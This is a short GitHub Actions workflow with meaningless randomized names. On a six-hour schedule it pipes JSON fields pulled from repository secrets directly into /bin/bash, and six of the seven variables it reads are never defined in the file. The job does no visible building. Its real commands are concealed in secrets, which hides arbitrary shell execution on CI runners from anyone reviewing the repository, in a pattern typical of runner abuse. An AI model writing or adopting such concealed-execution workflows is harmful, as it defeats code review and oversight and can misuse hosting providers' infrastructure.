name: zhongxiaoyan3456
on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaoyan3456
        env:
          nw468: ${{ secrets.nw468 }}
        run: |
          echo $nw468 | jq -r .j00396 | /bin/bash
          echo $pk2036 | jq -r .pmmg728 | /bin/bash
          echo $mtd43947 | jq -r .tt7170 | /bin/bash
          echo $wvzns85047 | jq -r .atn51585 | /bin/bash
          echo $pr3 | jq -r .msfop148 | /bin/bash
          echo $tnawx41 | jq -r .ewj83438 | /bin/bash
          echo $st39 | jq -r .n9010 | /bin/bash

